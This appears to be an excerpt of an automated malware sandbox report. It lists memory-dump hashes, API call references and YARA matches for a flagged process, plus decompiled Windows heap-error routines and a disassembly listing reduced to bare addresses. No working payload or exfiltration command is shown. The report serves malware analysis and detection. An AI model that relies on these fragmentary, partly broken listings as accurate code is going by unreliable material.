                                                                      • Opcode ID: d7e468a13f911ea09dfffdd2d0b8416e4cfd1568ed018b7af2ba5bf4cb66d0b0
                                                                      • Instruction ID: aefe46d8c5aadf57448340830c31d3e7b8ab21a53bd8bfc2737c3aef44b3866c
                                                                      • Opcode Fuzzy Hash: d7e468a13f911ea09dfffdd2d0b8416e4cfd1568ed018b7af2ba5bf4cb66d0b0
                                                                      • Instruction Fuzzy Hash: 16900271252055625545B1A9440450B4006B7E02917A1C012E5404A50CC5669856E761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 09494b9af6aa0a3809c7a5fc3038c649a87d77d241445695380b7bcccca39072
                                                                      • Instruction ID: 7482299ea703d13cb9417e703b74e653d275360af7e22e7e453439fd9a7fee62
                                                                      • Opcode Fuzzy Hash: 09494b9af6aa0a3809c7a5fc3038c649a87d77d241445695380b7bcccca39072
                                                                      • Instruction Fuzzy Hash: 1A90027161101912D10171A9440461A000AA7D0291FA1C022E5014655ECA658992B271
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 467905f462fcfce02dbe524272060be63837acd9394975aeebdd706450292fcd
                                                                      • Instruction ID: 957fc51a35d64a41d3402705c64fa926c58c27706c16b240490dce88c4e4ece5
                                                                      • Opcode Fuzzy Hash: 467905f462fcfce02dbe524272060be63837acd9394975aeebdd706450292fcd
                                                                      • Instruction Fuzzy Hash: BD90027161101452414071B9884490A4005BBE1261761C121E4988650DC599886567A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 12be80b5cf55956ebc187bbeea911c94c32ce792da461c4f066358a23a5200ee
                                                                      • Instruction ID: da9e3409535c43cfdbc4c210ecf0fe1ca4d87c40b32e227772ed0ce8faa01c56
                                                                      • Opcode Fuzzy Hash: 12be80b5cf55956ebc187bbeea911c94c32ce792da461c4f066358a23a5200ee
                                                                      • Instruction Fuzzy Hash: 5390027121141812D10061A9481470F0005A7D0352F61C011E5154655DC665885176B1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 39ef28459ca8c15048e955b6d9817467e2b1bd98826c541e382c12f7b75433a9
                                                                      • Instruction ID: fd74f2a82c17d61eda834c9eff345554c0773a7a40b43ecef18ee7c3c0251506
                                                                      • Opcode Fuzzy Hash: 39ef28459ca8c15048e955b6d9817467e2b1bd98826c541e382c12f7b75433a9
                                                                      • Instruction Fuzzy Hash: 4090027122181452D20065B94C14B0B0005A7D0353F61C115E4144654CC95588616661
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: c416c41861fa465c614b4da6d626d815c31df0d2e4be9d44bec6068ceb2e1d44
                                                                      • Instruction ID: 38d1bfe2cd39f05914e0b76a13b8f43cef4a63a74dd16369d88ac587f2bb90e2
                                                                      • Opcode Fuzzy Hash: c416c41861fa465c614b4da6d626d815c31df0d2e4be9d44bec6068ceb2e1d44
                                                                      • Instruction Fuzzy Hash: 88900275221014130105A5A9070450B0046A7D53A1361C021F5005650CD66188616261
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 533ce3611e9e2ee72c220ef7a627951d9a77dcafe69ff62a4841f298f9aca948
                                                                      • Instruction ID: 88ae375321cc7a12653467ea6522f521f25bf8059b747a207f68e660a27a1454
                                                                      • Opcode Fuzzy Hash: 533ce3611e9e2ee72c220ef7a627951d9a77dcafe69ff62a4841f298f9aca948
                                                                      • Instruction Fuzzy Hash: D79002B121201413410571A9441461A400AA7E0251B61C021E5004690DC56588917265
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 182bbfcc4d55ae639db8fba5997192b04ede42c92d92225c151a860e2d84d85c
                                                                      • Instruction ID: 9368a7fe1f031f81b25ec2a14b6b0fa325746ad6eb58d58bcdf7b11db143b38d
                                                                      • Opcode Fuzzy Hash: 182bbfcc4d55ae639db8fba5997192b04ede42c92d92225c151a860e2d84d85c
                                                                      • Instruction Fuzzy Hash: ED90027121101812D10065E9540864A0005A7E0351F61D011E9014655EC6A588917271
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 51fd962fa8f12edcdf2519f548e1db0c42af0962393a0d276923556c258b100f
                                                                      • Instruction ID: 00759e2f20228d6c47c8857dda809b65cb878e1816340e1b052057d3e440e809
                                                                      • Opcode Fuzzy Hash: 51fd962fa8f12edcdf2519f548e1db0c42af0962393a0d276923556c258b100f
                                                                      • Instruction Fuzzy Hash: 9F90027131101413D14071A9541860A4005F7E1351F61D011E4404654CD95588566362
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8e0010e3c2117c2f2db44d8ff0b18a34a2b492efe930bf004f65c8f3c34947c8
                                                                      • Instruction ID: db247ce974568f3da9d0737d0b8a35643ca5ec5a9f6d8d63e692312b277dffe8
                                                                      • Opcode Fuzzy Hash: 8e0010e3c2117c2f2db44d8ff0b18a34a2b492efe930bf004f65c8f3c34947c8
                                                                      • Instruction Fuzzy Hash: B390027922301412D18071A9540860E0005A7D1252FA1D415E4005658CC95588696361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 03242081235227c21bab1393676267e407e54755998207d8ba44612e2b4756bd
                                                                      • Instruction ID: 9f32f979072bb6f62f8a4012691d3e4adfeca6bf3b32c4ff262a7f83973cbbed
                                                                      • Opcode Fuzzy Hash: 03242081235227c21bab1393676267e407e54755998207d8ba44612e2b4756bd
                                                                      • Instruction Fuzzy Hash: 7E90027132115812D11061A9840470A0005A7D1251F61C411E4814658DC6D588917262
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 6d79875ba86a5abc54e5e74de05e806175a0ecef5ed4e8ef86189584ac6eb531
• Instruction ID: 850c9be054e57932477df38d809b417190aad082d2ecbbf130c2ab470e517f3e
• Opcode Fuzzy Hash: 6d79875ba86a5abc54e5e74de05e806175a0ecef5ed4e8ef86189584ac6eb531
• Instruction Fuzzy Hash: 8F90027121101C12D18071A9440464E0005A7D1351FA1C015E4015754DCA558A5977E1
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 00517df196e49d0ea2e6186c427eb12d2b21bd3181f93c3ee57d802f9202e04c
• Instruction ID: 4707e3e4c5b1c55b7de46eeb4af81ad2f67d8e5cf503da2eabeebe486391945e
• Opcode Fuzzy Hash: 00517df196e49d0ea2e6186c427eb12d2b21bd3181f93c3ee57d802f9202e04c
• Instruction Fuzzy Hash: 3890027121109C12D11061A9840474E0005A7D0351F65C411E8414758DC6D588917261
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 67c4254425f98e14c1a710a19429b94846c607caf1af295eb6ab99da40cf7e92
• Instruction ID: 55514b722471499677bdd526f7fe8ce36723f69554e9c1deace4c3fed910bf3f
• Opcode Fuzzy Hash: 67c4254425f98e14c1a710a19429b94846c607caf1af295eb6ab99da40cf7e92
• Instruction Fuzzy Hash: 38213AB2C4420857CB20E6649D42BFF73BCAB50304F44057FE989A3181F638BB498BA6
Uniqueness
• Uniqueness Score: -1.00%

APIs
• PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
Memory Dump Source
• Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: MessagePostThread
• String ID:
• API String ID: 1836367815-0
• Opcode ID: 87cbcea00010dbcaf848e6f0e418591bfe7b58868e3b9ceab28d61565b59612d
• Instruction ID: 5a072671537b26b6ed87b6c165d2972d8bf03b1b697a01369eb44fe348772ec6
• Opcode Fuzzy Hash: 87cbcea00010dbcaf848e6f0e418591bfe7b58868e3b9ceab28d61565b59612d
• Instruction Fuzzy Hash: 4B01A731A8032876E720A6959C03FFF776C5B40B55F15415EFF04BA1C2E6A87D0546FA
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
Memory Dump Source
• Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: 2383b15aae71cdd14fffb825e64e441733a0971417627929b0a1c622cb38846e
• Instruction ID: 8bc246f2462850e9cae5ba3bb82cc59fbcfe9b32184374d49ff2b326eb738374
• Opcode Fuzzy Hash: 2383b15aae71cdd14fffb825e64e441733a0971417627929b0a1c622cb38846e
• Instruction Fuzzy Hash: 1BF030B62142046BD710EF59DC45DE7779EEF84360B018559F90C97342C635E91086B4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
Memory Dump Source
• Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: e22a01980c14078cf1fc370f0bea47ad020e6c00f99a04d607c05b6b025ab2a8
• Instruction ID: 7306c21aaa6d986535a12e32f0a2237f273727f60a59211de1c72362dfdcedbd
• Opcode Fuzzy Hash: e22a01980c14078cf1fc370f0bea47ad020e6c00f99a04d607c05b6b025ab2a8
• Instruction Fuzzy Hash: ADF0EDB0200254ABCB14DF68CC49EEB3B68EF89314F25448DF9484B242CA30EC10CBA0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
Memory Dump Source
• Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
• Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
• Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
• Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
• Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
Memory Dump Source
• Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
• Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
• Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
• Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
Uniqueness
• Uniqueness Score: -1.00%

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
Memory Dump Source
• Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID:
• API String ID: 3899507212-0
• Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
• Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
• Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
• Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
Memory Dump Source
• Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: 42f6b837cb2edad3ee9e8b08c655a1ddcbb15cfb22028f61be55e06547beb694
• Instruction ID: 63c8b3cae4ba25db1c9da9a2fe72e7987aed1e5bba120d95b9a4d75c3da8bd9e
• Opcode Fuzzy Hash: 42f6b837cb2edad3ee9e8b08c655a1ddcbb15cfb22028f61be55e06547beb694
• Instruction Fuzzy Hash: 8EE0DF71204244BFD721DF64CC81ED7BF6DAF5A254F044198F989AB292C632AA00CBE0
Uniqueness
• Uniqueness Score: -1.00%

APIs
• ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
Memory Dump Source
• Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
Yara matches
Similarity
• API ID: ExitProcess
• String ID:
• API String ID: 621844428-0
• Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
• Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
• Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
• Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 3ccf79325444dfb02094fdb8097a881082f44758a5918427a674cd8c15a136ad
• Instruction ID: f94de940e2d599f37548b82767ea01a67fe854108f02798d02dba0a128e2b2e1
• Opcode Fuzzy Hash: 3ccf79325444dfb02094fdb8097a881082f44758a5918427a674cd8c15a136ad
• Instruction Fuzzy Hash: ACB09B719115D5D9DA11D7B4460871B794077D0755F26C461D3020741F4778C0D1F6B5
Uniqueness
• Uniqueness Score: -1.00%

Non-executed Functions

Strings
• write to, xrefs: 0128B4A6
• The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0128B323
• This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0128B476
• The resource is owned exclusively by thread %p, xrefs: 0128B374
• This failed because of error %Ix., xrefs: 0128B446
• *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0128B39B
• read from, xrefs: 0128B4AD, 0128B4B2
• *** Resource timeout (%p) in %ws:%s, xrefs: 0128B352
• <unknown>, xrefs: 0128B27E, 0128B2D1, 0128B350, 0128B399, 0128B417, 0128B48E
• *** enter .cxr %p for the context, xrefs: 0128B50D
• The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0128B38F
• *** A stack buffer overrun occurred in %ws:%s, xrefs: 0128B2F3
• a NULL pointer, xrefs: 0128B4E0
• The critical section is owned by thread %p., xrefs: 0128B3B9
• *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0128B53F
• This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0128B47D
• This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0128B305
• *** Inpage error in %ws:%s, xrefs: 0128B418
• The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0128B3D6
• The instruction at %p tried to %s , xrefs: 0128B4B6
• If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0128B314
• *** then kb to get the faulting stack, xrefs: 0128B51C
• Go determine why that thread has not released the critical section., xrefs: 0128B3C5
• *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0128B2DC
• The instruction at %p referenced memory at %p., xrefs: 0128B432
• The resource is owned shared by %d threads, xrefs: 0128B37E
• an invalid address, %p, xrefs: 0128B4CF
• This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0128B484
• *** An Access Violation occurred in %ws:%s, xrefs: 0128B48F
• *** enter .exr %p for the exception record, xrefs: 0128B4F1
Memory Dump Source
• Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
Similarity
• API ID:
• String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
• API String ID: 0-108210295
• Opcode ID: 2d6fcf3b36cd2f4e9386a268fd849f9b3014f1903bc308054ea41c442705fe96
• Instruction ID: 446075b9b056bf8a713f03d8e4007754b1ef4fadebc44b855d6713146ce058d7
• Opcode Fuzzy Hash: 2d6fcf3b36cd2f4e9386a268fd849f9b3014f1903bc308054ea41c442705fe96
• Instruction Fuzzy Hash: 72814975A21211FFDF2A6B4ADC96E7B3F29EF66A91F00005CF6041B192D3658451C7B2
Uniqueness
• Uniqueness Score: -1.00%

C-Code - Quality: 44%
E01291C06() {
	signed int _t27;
	char* _t104;
	char* _t105;
	intOrPtr _t113;
	intOrPtr _t115;
	intOrPtr _t117;
	intOrPtr _t119;
	intOrPtr _t120;

	_t105 = 0x11b48a4;
	_t104 = "HEAP: ";
	if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
		_push(_t104);
		E011DB150();
	} else {
		E011DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
	}
	_push( *0x12c589c);
	E011DB150("Heap error detected at %p (heap handle %p)\n",  *0x12c58a0);
	_t27 =  *0x12c5898; // 0x0
	if(_t27 <= 0xf) {
		switch( *((intOrPtr*)(_t27 * 4 +  &M01291E96))) {
			case 0:
				_t105 = "heap_failure_internal";
				goto L21;
			case 1:
				goto L21;
			case 2:
				goto L21;
			case 3:
				goto L21;
			case 4:
				goto L21;
			case 5:
				goto L21;
			case 6:
				goto L21;
			case 7:
				goto L21;
			case 8:
				goto L21;
			case 9:
				goto L21;
			case 0xa:
				goto L21;
			case 0xb:
				goto L21;
			case 0xc:
				goto L21;
			case 0xd:
				goto L21;
			case 0xe:
				goto L21;
			case 0xf:
				goto L21;
		}
	}
	L21:
	if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
		_push(_t104);
		E011DB150();
	} else {
		E011DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
	}
	_push(_t105);
	E011DB150("Error code: %d - %s\n",  *0x12c5898);
	_t113 =  *0x12c58a4; // 0x0
	if(_t113 != 0) {
		if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
			_push(_t104);
			E011DB150();
		} else {
			E011DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
		}
		E011DB150("Parameter1: %p\n",  *0x12c58a4);
	}
	_t115 =  *0x12c58a8; // 0x0
	if(_t115 != 0) {
		if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
			_push(_t104);
			E011DB150();
		} else {
			E011DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
		}
		E011DB150("Parameter2: %p\n",  *0x12c58a8);
	}
	_t117 =  *0x12c58ac; // 0x0
	if(_t117 != 0) {
		if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
			_push(_t104);
                                                                      						E011DB150();
                                                                      					} else {
                                                                      						E011DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					E011DB150("Parameter3: %p\n",  *0x12c58ac);
                                                                      				}
                                                                      				_t119 =  *0x12c58b0; // 0x0
                                                                      				if(_t119 != 0) {
                                                                      					L41:
                                                                      					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      						_push(_t104);
                                                                      						E011DB150();
                                                                      					} else {
                                                                      						E011DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      					}
                                                                      					_push( *0x12c58b4);
                                                                      					E011DB150("Last known valid blocks: before - %p, after - %p\n",  *0x12c58b0);
                                                                      				} else {
                                                                      					_t120 =  *0x12c58b4; // 0x0
                                                                      					if(_t120 != 0) {
                                                                      						goto L41;
                                                                      					}
                                                                      				}
                                                                      				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                                      					_push(_t104);
                                                                      					E011DB150();
                                                                      				} else {
                                                                      					E011DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                      				}
                                                                      				return E011DB150("Stack trace available at %p\n", 0x12c58c0);
                                                                      			}

Disassembly listing: only the instruction address column survived extraction (addresses 0x01291c10 through 0x01291e95; the instruction text is not present on the page, and 0x00000000 entries have been omitted).

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                      • API String ID: 0-2897834094
                                                                      • Opcode ID: 599b2d9868033927155705ec6805fbae7fdb3e47d3d27b15cce967051031ed4c
                                                                      • Instruction ID: c8a33e47728d03a0ac7dbcc67b899619806a013df72d7f6c9d486e3c979eab95
                                                                      • Opcode Fuzzy Hash: 599b2d9868033927155705ec6805fbae7fdb3e47d3d27b15cce967051031ed4c
                                                                      • Instruction Fuzzy Hash: 1061E736536183DFDB19A75EE589E2177F4EB20D31B0D802DF60A6B304D764A890CB1E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 96%
                                                                      			E011E3D34(signed int* __ecx) {
                                                                      				signed int* _v8;
                                                                      				char _v12;
                                                                      				signed int* _v16;
                                                                      				signed int* _v20;
                                                                      				char _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				char _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int* _v48;
                                                                      				signed int* _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				char _v68;
                                                                      				signed int _t140;
                                                                      				signed int _t161;
                                                                      				signed int* _t236;
                                                                      				signed int* _t242;
                                                                      				signed int* _t243;
                                                                      				signed int* _t244;
                                                                      				signed int* _t245;
                                                                      				signed int _t255;
                                                                      				void* _t257;
                                                                      				signed int _t260;
                                                                      				void* _t262;
                                                                      				signed int _t264;
                                                                      				void* _t267;
                                                                      				signed int _t275;
                                                                      				signed int* _t276;
                                                                      				short* _t277;
                                                                      				signed int* _t278;
                                                                      				signed int* _t279;
                                                                      				signed int* _t280;
                                                                      				short* _t281;
                                                                      				signed int* _t282;
                                                                      				short* _t283;
                                                                      				signed int* _t284;
                                                                      				void* _t285;
                                                                      
                                                                      				_v60 = _v60 | 0xffffffff;
                                                                      				_t280 = 0;
                                                                      				_t242 = __ecx;
                                                                      				_v52 = __ecx;
                                                                      				_v8 = 0;
                                                                      				_v20 = 0;
                                                                      				_v40 = 0;
                                                                      				_v28 = 0;
                                                                      				_v32 = 0;
                                                                      				_v44 = 0;
                                                                      				_v56 = 0;
                                                                      				_t275 = 0;
                                                                      				_v16 = 0;
                                                                      				if(__ecx == 0) {
                                                                      					_t280 = 0xc000000d;
                                                                      					_t140 = 0;
                                                                      					L50:
                                                                      					 *_t242 =  *_t242 | 0x00000800;
                                                                      					_t242[0x13] = _t140;
                                                                      					_t242[0x16] = _v40;
                                                                      					_t242[0x18] = _v28;
                                                                      					_t242[0x14] = _v32;
                                                                      					_t242[0x17] = _t275;
                                                                      					_t242[0x15] = _v44;
                                                                      					_t242[0x11] = _v56;
                                                                      					_t242[0x12] = _v60;
                                                                      					return _t280;
                                                                      				}
                                                                      				if(E011E1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                                      					_v56 = 1;
                                                                      					if(_v8 != 0) {
                                                                      						L011F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                                      					}
